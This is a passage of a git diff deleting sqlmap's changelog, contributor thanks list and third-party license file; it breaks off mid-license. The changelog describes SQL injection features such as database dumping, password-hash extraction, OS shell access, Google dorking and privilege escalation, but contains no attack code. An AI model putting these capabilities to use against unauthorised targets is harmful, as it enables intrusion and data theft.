-* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
-* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
-* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
-* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
-* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
-* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
-* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
-* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
-* Minor improvements to sqlmap Debian package files;
-* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
-* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
-* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
-* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
-* Minor bug fix to correctly dump table entries when the column is provided;
-* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
-* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
-* Increased default output level from 0 to 1;
-* Updated documentation.
-
-# Version 0.6.2 (2008-11-02)
-
-* Major bug fix to correctly dump tables entries when `--stop` is not specified;
-* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
-* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
-* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
-* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
-* Minor bug fix in MySQL comment injection fingerprint technique;
-* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
-* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
-* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
-* More user-friendly warning messages.
-
-# Version 0.6.1 (2008-08-20)
-
-* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
-* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
-* Implemented possibility to test for and inject also on LIKE statements;
-* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
-* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
-* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
-* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
-* Minor bug fix to correctly handle parameters' value with `%` character.
-
-# Version 0.6 (2008-09-01)
-
-* Complete code refactor and many bugs fixed;
-* Added multithreading support to set the maximum number of concurrent HTTP requests;
-* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
-* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
-* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
-* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
-* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
-* Created sqlmap .exe (Windows) portable executable;
-* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
-* Improved automatic check for parenthesis when testing and forging SQL query vector;
-* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
-* Implemented support for HTTPS requests over HTTP(S) proxy;
-* Added a check to handle NULL or not available queries output;
-* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
-* Improved XML files structure;
-* Implemented the possibility to change the HTTP Referer header;
-* Added support to resume from session file also when running with inband SQL injection attack;
-* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
-* Added a check to assure that the provided string to match (`--string`) is within the page content;
-* Fixed various queries in XML file;
-* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
-* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
-* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
-* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
-* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
-* Added support to inject also on Set-Cookie parameters;
-* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
-* Renamed some command line options;
-* Added a conversion library;
-* Added code schema and reminders for future developments;
-* Added Copyright comment and $Id$;
-* Updated the command line layout and help messages;
-* Updated some docstrings;
-* Updated documentation files.
-
-# Version 0.5 (2007-11-04)
-
-* Added support for Oracle database management system
-* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
-* Added support to extract database users password hash on Microsoft SQL Server;
-* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
-* Added support for SQL injection on HTTP Cookie and User-Agent headers;
-* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
-* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
-* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
-* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
-* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
-* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
-* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
-* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
-* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
-* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
-* More minor layout enhancements in some libraries;
-* Renamed DMBS plugins;
-* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
-* Updated all documentation files.
-
-# Version 0.4 (2007-06-15)
-
-* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
-* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
-* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
-* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
-* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ;
-* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
-* Improved logging functionality: passed from banal 'print' to Python native logging library;
-* Added support for more than one parameter in `-p` command line option;
-* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
-* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
-* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
-* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
-* Added support to specify the database table column to enumerate (`-C COL`);
-* Added inband SQL injection (UNION query) support (`--union-use`);
-* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
-* Reviewed the directory tree structure;
-* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
-* Updated documentation files.
-
-# Version 0.3 (2007-01-20)
-
-* Added module for MS SQL Server;
-* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
-* Added PostgreSQL dbms active fingerprint;
-* Added support for string match (`--string`);
-* Added support for UNION check (`--union-check`);
-* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
-* Added support for `--data` command line argument to pass the string for POST requests;
-* Added encodeParams() method to encode url parameters before making http request;
-* Many bug fixes;
-* Rewritten documentation files;
-* Complete code restyling.
-
-# Version 0.2 (2006-12-13)
-
-* complete refactor of entire program;
-* added TODO and THANKS files;
-* added some papers references in README file;
-* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
-* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
-* replaced old inference algorithm with a new bisection algorithm.
-* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
-* improved Common class, adding support for http proxy and http post method in hash_page;
-* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
-* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
-* improved output methods in dump.py;
-* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.
diff --git a/doc/THANKS.md b/doc/THANKS.md
deleted file mode 100644
index 3d5e9ec7e75..00000000000
--- a/doc/THANKS.md
+++ /dev/null
@@ -1,819 +0,0 @@
-# Individuals
-
-Andres Tarasco Acuna,
-* for suggesting a feature
-
-Santiago Accurso,
-* for reporting a bug
-
-Syed Afzal,
-* for contributing a WAF script varnish.py
-
-Zaki Akhmad,
-* for suggesting a couple of features
-
-Olu Akindeinde,
-* for reporting a couple of bugs
-
-David Alvarez,
-* for reporting a bug
-
-Sergio Alves,
-* for reporting a bug
-
-Thomas Anderson,
-* for reporting a bug
-
-Chip Andrews,
-* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
-
-Smith Andy,
-* for suggesting a feature
-
-Otavio Augusto,
-* for reporting a minor bug
-
-Simon Baker,
-* for reporting some bugs
-
-Ryan Barnett,
-* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
-
-Emiliano Bazaes,
-* for reporting a minor bug
-
-Daniele Bellucci,
-* for starting sqlmap project and developing it between July and August 2006
-
-Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH
-* for contributing the DB2 support initial patch: fingerprint and enumeration
-
-Anthony Boynes,
-* for reporting several bugs
-
-Marcelo Toscani Brandao
-* for reporting a bug
-
-Velky Brat,
-* for suggesting a minor enhancement to the bisection algorithm
-
-James Briggs,
-* for suggesting a minor enhancement
-
-Gianluca Brindisi,
-* for reporting a couple of bugs
-
-Jack Butler,
-* for contributing the sqlmap site favicon
-
-Ulisses Castro,
-* for reporting a bug
-
-Roberto Castrogiovanni,
-* for reporting a minor bug
-
-Cesar Cerrudo,
-* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
-
-Karl Chen,
-* for contributing the initial multi-threading patch for the inference algorithm
-
-Y P Chien,
-* for reporting a minor bug
-
-Pierre Chifflier, and Mark Hymers,
-* for uploading and accepting the sqlmap Debian package to the official Debian project repository
-
-Hysia Chow
-* for contributing a couple of WAF scripts
-
-Chris Clements,
-* for reporting a couple of bugs
-
-John Cobb,
-* for reporting a minor bug
-
-Andreas Constantinides,
-* for reporting a minor bug
-
-Andre Costa,
-* for reporting a minor bug
-* for suggesting a minor enhancement
-
-Ulises U. Cune,
-* for reporting a bug
-
-Alessandro Curio,
-* for reporting a minor bug
-
-Alessio Dalla Piazza,
-* for reporting a couple of bugs
-
-Alexis Danizan,
-* for contributing support for ClickHouse
-
-Sherif El-Deeb,
-* for reporting a minor bug
-
-Thomas Etrillard,
-* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
-
-Stefano Di Paola,
-* for suggesting good features
-
-Mosk Dmitri,
-* for reporting a minor bug
-
-Meng Dong,
-* for contributing a code for Waffit integration
-
-Carey Evans,
-* for his fcrypt module that allows crypt(3) support
- on Windows platforms
-
-Shawn Evans,
-* for suggesting an idea for one tamper script, greatest.py
-
-Adam Faheem,
-* for reporting a few bugs
-
-James Fisher,
-* for contributing two very good feature requests
-* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
-
-Jim Forster,
-* for reporting a bug
-
-Rong-En Fan,
-* for committing the sqlmap 0.5 port to the official FreeBSD project repository
-
-Giorgio Fedon,
-* for suggesting a speed improvement for bisection algorithm
-* for reporting a bug when running against Microsoft SQL Server 2005
-
-Kasper Fons,
-* for reporting several bugs
-
-Alan Franzoni,
-* for helping out with Python subprocess library
-
-Harold Fry,
-* for suggesting a minor enhancement
-
-Daniel G. Gamonal,
-* for reporting a minor bug
-
-Marcos Mateos Garcia,
-* for reporting a minor bug
-
-Andrew Gecse,
-* for reporting a minor issue
-
-Ivan Giacomelli,
-* for reporting a bug
-* for suggesting a minor enhancement
-* for reviewing the documentation
-
-Dimitris Giannitsaros,
-* for contributing a REST-JSON API client
-
-Nico Golde,
-* for reporting a couple of bugs
-
-Oliver Gruskovnjak,
-* for reporting a bug
-* for contributing a minor patch
-
-Davide Guerri,
-* for suggesting an enhancement
-
-Dan Guido,
-* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
-
-David Guimaraes,
-* for reporting considerable amount of bugs
-* for suggesting several features
-
-Chris Hall,
-* for coding the prettyprint.py library
-
-Tate Hansen,
-* for donating to sqlmap development
-
-Mario Heiderich,
-Christian Matthies,
-Lars H. Strojny,
-* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS
-
-Kristian Erik Hermansen,
-* for reporting a bug
-* for donating to sqlmap development
-
-Alexander Hagenah,
-* for reporting a minor bug
-
-Dennis Hecken,
-* for reporting a minor bug
-
-Choi Ho,
-* for reporting a minor bug
-
-Jorge Hoya,
-* for suggesting a minor enhancement
-
-Will Holcomb,
-* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
-
-Daniel Huckmann,
-* for reporting a couple of bugs
-
-Daliev Ilya,
-* for reporting a bug
-
-Mehmet İnce,
-* for contributing a tamper script xforwardedfor.py
-
-Jovon Itwaru,
-* for reporting a minor bug
-
-Prashant Jadhav,
-* for reporting a bug
-
-Dirk Jagdmann,
-* for reporting a typo in the documentation
-
-Luke Jahnke,
-* for reporting a bug when running against MySQL < 5.0
-
-Andrew Kitis
-* for contributing a tamper script lowercase.py
-
-David Klein,
-* for reporting a minor code improvement
-
-Sven Klemm,
-* for reporting two minor bugs with PostgreSQL
-
-Anant Kochhar,
-* for providing with feedback on the user's manual
-
-Dmitriy Kononov,
-* for reporting a minor bug
-
-Alexander Kornbrust,
-* for reporting a couple of bugs
-
-Krzysztof Kotowicz,
-* for reporting a minor bug
-
-Nicolas Krassas,
-* for reporting a couple of bugs
-
-Oliver Kuckertz,
-* for contributing a minor patch
-
-Alex Landa,
-* for contributing a patch adding beta support for XML output
-
-Guido Landi,
-* for reporting a couple of bugs
-* for the great technical discussions
-* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
-* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
-
-Lee Lawson,
-* for reporting a minor bug
-
-John J. Lee, and others
-* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
-
-Nico Leidecker,
-* for providing with feedback on a few features
-* for reporting a couple of bugs
-* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
-
-Gabriel Lima,
-* for reporting a couple of bugs
-
-Svyatoslav Lisin,
-* for suggesting a minor feature
-
-Miguel Lopes,
-* for reporting a minor bug
-
-Truong Duc Luong,
-* for reporting a minor bug
-
-Pavol Luptak,
-* for reporting a bug when injecting on a POST data parameter
-
-Till Maas,
-* for suggesting a minor feature
-
-Michael Majchrowicz,
-* for extensively beta-testing sqlmap on various MySQL DBMS
-* for providing really appreciated feedback
-* for suggesting a lot of ideas and features
-
-Vinícius Henrique Marangoni,
-* for contributing a Portuguese translation of README.md
-
-Francesco Marano,
-* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
-
-Ahmad Maulana,
-* for contributing a tamper script halfversionedmorekeywords.py
-
-Ferruh Mavituna,
-* for exchanging ideas on the implementation of a couple of features
-
-David McNab,
-* for his XMLObject module that allows XML files to be operated on like Python objects
-
-Spencer J. McIntyre,
-* for reporting a minor bug
-* for contributing a patch for OS fingerprinting on DB2
-
-Brad Merrell,
-* for reporting a minor bug
-
-Michael Meyer,
-* for suggesting a minor feature
-
-Enrico Milanese,
-* for reporting a minor bug
-* for sharing some ideas for the PHP backdoor
-
-Liran Mimoni,
-* for reporting a minor bug
-
-Marco Mirandola,
-* for reporting a minor bug
-
-Devon Mitchell,
-* for reporting a minor bug
-
-Anton Mogilin,
-* for reporting a few bugs
-
-Sergio Molina,
-* for reporting a minor bug
-
-Anastasios Monachos,
-* for providing some useful data
-* for suggesting a feature
-* for reporting a couple of bugs
-
-Kirill Morozov,
-* for reporting a bug
-* for suggesting a feature
-
-Alejo Murillo Moya,
-* for reporting a minor bug
-* for suggesting a few features
-
-Yonny Mutai,
-* for reporting a minor bug
-
-Roberto Nemirovsky,
-* for pointing out some enhancements
-
-Sebastian Nerz,
-* for reporting a (potential) vulnerability in --eval
-
-Simone Onofri,
-* for patching the PHP web backdoor to make it work properly also on Windows
-
-Michele Orru,
-* for reporting a couple of bug
-* for suggesting ideas on how to implement the RESTful API
-
-Shaohua Pan,
-* for reporting several bugs
-* for suggesting a few features
-
-Antonio Parata,
-* for sharing some ideas for the PHP backdoor
-
-Adrian Pastor,
-* for donating to sqlmap development
-
-Christopher Patten,
-* for reporting a bug in the blind SQL injection bisection algorithm
-
-Zack Payton,
-* for reporting a minor bug
-
-Jaime Penalba,
-* for contributing a patch for INSERT/UPDATE generic boundaries
-
-Pedrito Perez, <0ark1ang3l(at)gmail.com>
-* for reporting a couple of bugs
-
-Brandon Perry,
-* for reporting a couple of bugs
-
-Travis Phillips,
-* for suggesting a minor enhancement
-
-Mark Pilgrim,
-* for porting chardet package (Universal Encoding Detector) to Python
-
-Steve Pinkham,
-* for suggesting a feature
-* for contributing a new SQL injection vector (MSSQL time-based blind)
-* for donating to sqlmap development
-
-Adam Pridgen,
-* for suggesting some features
-
-Luka Pusic,
-* for reporting a couple of bugs
-
-Ole Rasmussen,
-* for reporting a bug
-* for suggesting a feature
-
-Alberto Revelli,
-* for inspiring to write sqlmap user's manual in SGML
-* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
-
-David Rhoades,
-* for reporting a bug
-
-Andres Riancho,
-* for beta-testing sqlmap
-* for reporting a bug and suggesting some features
-* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
-* for suggesting a way for handling DNS caching
-
-Jamie Riden,
-* for reporting a minor bug
-
-Alexander Rigbo,
-* for contributing a minor patch
-
-Antonio Riva,
-* for reporting a bug when running with python 2.5
-
-Ethan Robish,
-* for reporting a bug
-
-Levente Rog,
-* for reporting a minor bug
-
-Andrea Rossi,
-* for reporting a minor bug
-* for suggesting a feature
-
-Frederic Roy,
-* for reporting a couple of bugs
-
-Vladimir Rutsky,
-* for suggesting a couple of minor enhancements
-
-Richard Safran,
-* for donating the sqlmap.org domain
-
-Tomoyuki Sakurai,
-* for submitting to the FreeBSD project the sqlmap 0.5 port
-
-Roberto Salgado,
-* for contributing considerable amount of tamper scripts
-
-Pedro Jacques Santos Santiago,
-* for reporting considerable amount of bugs
-
-Marek Sarvas,
-* for reporting several bugs
-
-Philippe A. R. Schaeffer,
-* for reporting a minor bug
-
-Henri Salo
-* for a donation
-
-Mohd Zamiri Sanin,
-* for reporting a minor bug
-
-Jorge Santos,
-* for reporting a minor bug
-
-Sven Schluter,
-* for contributing a patch
-* for waiting a number of seconds between each HTTP request
-
-Ryan Sears,
-* for suggesting a couple of enhancements
-* for donating to sqlmap development
-
-Uemit Seren,
-* for reporting a minor adjustment when running with python 2.6
-
-Shane Sewell,
-* for suggesting a feature
-
-Ahmed Shawky,
-* for reporting a major bug with improper handling of parameter values
-* for reporting a bug
-
-Brian Shura,
-* for reporting a bug
-
-Sumit Siddharth,
-* for sharing ideas on the implementation of a couple of features
-
-Andre Silva,
-* for reporting a bug
-
-Benjamin Silva H.
-* for reporting a bug
-
-Duarte Silva
-* for reporting a couple of bugs
-
-M Simkin,
-* for suggesting a feature
-
-Konrads Smelkovs,
-* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
-
-Chris Spencer,
-* for reviewing the user's manual grammar
-
-Michael D. Stenner,
-* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
-
-Marek Stiefenhofer,
-* for reporting a few bugs
-
-Jason Swan,
-* for reporting a bug when enumerating columns on Microsoft SQL Server
-* for suggesting a couple of improvements
-
-Chilik Tamir,
-* for contributing a patch for initial support SOAP requests
-
-Alessandro Tanasi,
-* for extensively beta-testing sqlmap
-* for suggesting many features and reporting some bugs
-* for reviewing the documentation
-
-Andres Tarasco,
-* for contributing good feedback
-
-Tom Thumb,
-* for reporting a major bug
-
-Kazim Bugra Tombul,
-* for reporting a minor bug
-
-Efrain Torres,
-* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
-* for his great Metasploit WMAP Framework
-
-Jennifer Torres,
-* for contributing a tamper script luanginx.py
-
-Sandro Tosi,
-* for helping to create sqlmap Debian package correctly
-
-Jacco van Tuijl,
-* for reporting several bugs
-
-Vitaly Turenko,
-* for reporting a bug
-
-Augusto Urbieta,
-* for reporting a minor bug
-
-Bedirhan Urgun,
-* for reporting a few bugs
-* for suggesting some features and improvements
-* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
-
-Kyprianos Vasilopoulos,
-* for reporting a couple of minor bugs
-
-Vlado Velichkovski,
-* for reporting considerable amount of bugs
-* for suggesting an enhancement
-
-Johnny Venter,
-* for reporting a couple of bugs
-
-Carlos Gabriel Vergara,
-* for suggesting couple of good features
-
-Patrick Webster,
-* for suggesting an enhancement
-* for donating to sqlmap development (from OSI.Security)
-
-Ed Williams,
-* for suggesting a minor enhancement
-
-Anthony Zboralski,
-* for providing with detailed feedback
-* for reporting a few minor bugs
-* for donating to sqlmap development
-
-Thierry Zoller,
-* for reporting a couple of major bugs
-
-Zhen Zhou,
-* for suggesting a feature
-
--insane-,
-* for reporting a minor bug
-
-1ndr4 joe,
-* for reporting a couple of bugs
-
-abc abc,
-* for reporting a minor bug
-
-Abuse 007,
-* for reporting a bug
-
-agix,
-* for contributing the file upload via certutil.exe functionality
-
-Alex,
-* for reporting a minor bug
-
-anonymous anonymous,
-* for reporting a couple of bugs
-
-bamboo,
-* for reporting a couple of bugs
-
-Brandon E.,
-* for reporting a bug
-
-black zero,
-* for reporting a minor bug
-
-blueBoy,
-* for reporting a bug
-
-buawig,
-* for reporting considerable amount of bugs
-
-Bugtrace,
-* for reporting several bugs
-
-cats,
-* for reporting a couple of bugs
-
-Christian S,
-* for reporting a minor bug
-
-clav,
-* for reporting a minor bug
-
-dragoun dash,
-* for reporting a minor bug
-
-flsf,
-* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
-* for contributing a minor patch
-
-fufuh,
-* for reporting a bug when running on Windows
-
-Hans Wurst,
-* for reporting a couple of bugs
-
-Hysia,
-* for contributing a Chinese translation of README.md
-
-james,
-* for reporting a bug
-
-Joe "Pragmatk",
-* for reporting a few bugs
-
-John Smith,
-* for reporting several bugs
-* for suggesting some features
-
-m4l1c3,
-* for reporting considerable amount of bugs
-
-mariano,
-* for reporting a bug
-
-mitchell,
-* for reporting a few bugs
-
-Nadzree,
-* for reporting a minor bug
-
-nightman,
-* for reporting considerable amount of bugs
-
-Oso Dog osodog123(at)yahoo.com
-* for reporting a minor bug
-
-pacman730,
-* for reporting a bug
-
-pentestmonkey,
-* for reporting several bugs
-* for suggesting a few minor enhancements
-
-Phat R.,
-* for reporting a few bugs
-
-Phil P, <(at)superevr>
-* for suggesting a minor enhancement
-
-ragos,
-* for reporting a minor bug
-
-rmillet,
-* for reporting a bug
-
-Rub3nCT,
-* for reporting a minor bug
-
-sapra,
-* for helping out with Python multiprocessing library on MacOS
-
-shiftzwei,
-* for reporting a couple of bugs
-
-smith,
-* for reporting a minor bug
-
-Soma Cruz,
-* for reporting a minor bug
-
-Spiros94,
-* for contributing a Greek translation of README.md
-
-Stuffe,
-* for reporting a minor bug and a feature request
-
-Sylphid,
-* for suggesting some features
-
-syssecurity.info,
-* for reporting a minor bug
-
-This LittlePiggy,
-* for reporting a minor bug
-
-ToR,
-* for reporting considerable amount of bugs
-* for suggesting a feature
-
-ultramegaman,
-* for reporting a minor bug
-
-Vinicius,
-* for reporting a minor bug
-
-virusdefender
-* for contributing WAF scripts safeline.py
-
-w8ay
-* for contributing an implementation for chunked transfer-encoding (switch --chunked)
-
-wanglei,
-* for reporting a minor bug
-
-warninggp,
-* for reporting a few minor bugs
-
-x,
-* for reporting a bug
-
-zhouhx,
-* for contributing a minor patch
-
-# Organizations
-
-Black Hat team,
-* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
- * Homepage: http://goo.gl/BKfs7
- * Slides: http://goo.gl/Dh65t
- * White paper: http://goo.gl/spX3N
-
-SOURCE Conference team,
-* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
- * Homepage: http://goo.gl/IeXV4
- * Slides: http://goo.gl/OKnfj
-
-AthCon Conference team,
-* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
- * Homepage: http://goo.gl/Fs71I
- * Slides: http://goo.gl/QMfjO
-
-Metasploit Framework development team,
-* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
- * Homepage: http://www.metasploit.com
-
-OWASP Board,
-* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
- * Homepage: http://www.owasp.org
diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md
deleted file mode 100644
index 76d9e8fe350..00000000000
--- a/doc/THIRD-PARTY.md
+++ /dev/null
@@ -1,311 +0,0 @@
-This file lists bundled packages and their associated licensing terms.
-
-# BSD
-
-* The `Ansistrm` library located under `thirdparty/ansistrm/`.
- Copyright (C) 2010-2012, Vinay Sajip.
-* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`.
- Copyright (C) 2004-2010, Leonard Richardson.
-* The `ClientForm` library located under `thirdparty/clientform/`.
- Copyright (C) 2002-2007, John J. Lee.
- Copyright (C) 2005, Gary Poster.
- Copyright (C) 2005, Zope Corporation.
- Copyright (C) 1998-2000, Gisle Aas.
-* The `Colorama` library located under `thirdparty/colorama/`.
- Copyright (C) 2013, Jonathan Hartley.
-* The `Fcrypt` library located under `thirdparty/fcrypt/`.
- Copyright (C) 2000, 2001, 2004 Carey Evans.
-* The `PrettyPrint` library located under `thirdparty/prettyprint/`.
- Copyright (C) 2010, Chris Hall.
-* The `SocksiPy` library located under `thirdparty/socks/`.
- Copyright (C) 2006, Dan-Haim.
-
-````
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
- - Redistributions of source code must retain the above copyright
- notice, this list of conditions and the following disclaimer.
- - Redistributions in binary form must reproduce the above copyright
- notice, this list of conditions and the following disclaimer in the
- documentation and/or other materials provided with the distribution.
- - Neither the name of the nor the
- names of its contributors may be used to endorse or promote products
- derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL